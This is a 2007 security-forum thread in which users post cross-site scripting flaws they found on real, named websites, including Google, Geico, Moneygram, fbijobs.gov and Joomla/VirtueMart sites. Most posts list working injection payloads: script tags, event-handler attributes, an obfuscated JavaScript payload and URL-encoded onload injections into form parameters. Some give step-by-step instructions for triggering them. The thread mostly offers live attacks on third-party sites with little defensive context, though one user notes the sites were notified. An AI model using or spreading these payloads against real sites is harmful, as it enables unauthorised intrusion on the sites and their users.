XSSQLi - deadly combo...

[www.mrrc.de]

---
g:0in~/*for another*/~alert(!!1)
(Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç[È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å)
me || PHPIDS || Twitter || <malicious></markup>

[www.bmsg.gv.at]

[www.moneybookers.com]
touch the search field `and money moves`

[moneygram.com]"onmouseover="alert(this.innerText);"&LC=EN

mouseover the navigation links.

-tx @ lowtech-labs.org

rather frame spoofing than XSS, anyway feel happy if your flight is controlled by DFS ;-)
[www.dfs.de]

In the frontline to copyright your XSS
[www.gvu.de]



Edited 1 time(s). Last edit at 02/03/2007 03:59AM by kirke.

[www.adobe.com]

- RSnake
Gotta love it. http://ha.ckers.org

[namecheap]

yes I'm good ;-)

google XSS flaw by me ( [www.mybeNi.tk] )

[www.google.com]


cheers

btw they were notified.



Edited 2 time(s). Last edit at 02/08/2007 09:16AM by alf.

I'm gonna go ahead and throw these up here because it appears to be fixed in Joomla 1.0.12 (although that may only be with sites that are using SEF URLs, I'm gonna test it further this evening).
In any event:
[www.joomlapolis.com]";//><script>alert(String.fromCharCode(88,83,83));</script><p%20id="3/

[virtuemart.net]";//></script><script>alert(1);var%20i="i

[virtuemart.net]";//><script>alert(1);</script><p%20id="3

[virtuemart.net]";//><script>alert(1);</script><p%20id="3

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 02/07/2007 08:15PM by tx.

[www.budget.com]

[frwebgate.access.gpo.gov]:

[ats.nist.gov];

xss with error & script info displayed:
[cindex.camden.gov.uk];

cleaner output of the above url (no xss):
[cindex.camden.gov.uk]

[www.csm.ornl.gov]

[www.ca.sandia.gov];

---------------
Digital footprints suck. Learn to walk on your hands.
[www.youfucktard.com]



Edited 4 time(s). Last edit at 02/09/2007 08:01PM by Luny.

[myweb2.search.yahoo.com]
[www.yahoo.americangreetings.com]
IE6 only

[search.xanga.com]
[www.jobsdb.com]
[search.tom.com]

- Hong



Edited 1 time(s). Last edit at 02/12/2007 05:04AM by Hong.

Go to
[www.fbijobs.gov]

and enter <script>alert("xss");</script> in the search field. I tried to find whiteacids script that forwards post vulns... But I couldnt.

-bubbles
[webmastertutorials.net]

You fat:

[www.rawrcore.net]

.GOV EXPLOITS! H0mGAZ!11

[www.rawrcore.net]

and I guess I'll throw this one out there because I published like a year ago and no one seemed to care:

[secure.geico.com]

WHY DOES EVERYONE IGNORE MY EXPLOITS!!??! WAHHH!!1

bubbles, you don't need the post forwarder. This form accepts GET input: [www.fbijobs.gov]

But this one has been there already: [sla.ckers.org]

It is ironical... [marketwatch.nytimes.com]



Edited 1 time(s). Last edit at 02/13/2007 12:25PM by trev.

Lockdown Wrote:
>
> [secure.geico.com]
> A_firstName=lawl%22%3E%3Cbody%20onload=%22alert('l
> ol');document.write('An%20XSS%20so%20easy,%20even%
> 20a%20caveman%20can%20do%20it.');%22%3E%3Cspan
>
>

Funny how much they spend on TV ads, and apparently little on the IT side.

I love their TV commercials, though, LOL.

@Trev
Yeah, I figured it had been found already, but I didnt want to search through 39 pages to find it :)

-bubbles
[webmastertutorials.net]

bubbles, you don't have to - that's what the forum search is for.

Orly, I didnt even know this forum had a search... I'll keep that in mind for next time.

-bubbles
[webmastertutorials.net]

<3 Geico commercials.

Cigarrettes [www.smokerswelcome.com]

[www.philipmorrisusa.com]

-Lockdown-

[www.rawrcore.net]



Edited 2 time(s). Last edit at 02/15/2007 01:55AM by Lockdown.

[www.networkcomputing.com]";alert(String.fromCharCode(88,83,83));ds_pageName="

-tx @ lowtech-labs.org

nice list with mainly (i)frame spoofing again, posting from SkyOut seen at lists.grok.org.uk/pipermail/full-disclosure/2007-February/052496.html :

[baseportal.com]

your money is as save as XSS in austria ;-)

[www.mpaa.org]

- RSnake
Gotta love it. http://ha.ckers.org

nice one!

-tx @ lowtech-labs.org

[www.billoreilly.com]

XSS friendly site, inserts type="text/javascript" if we forget it :-))

[www.bvdw.org]

ROFL @ Above

We know we're insecure, but we can't have hackers not adhering to w3c standards!

-Lockdown-

[www.rawrcore.net]

Hahah! I've never seen that before. How nice of them to help you out like that.

- RSnake
Gotta love it. http://ha.ckers.org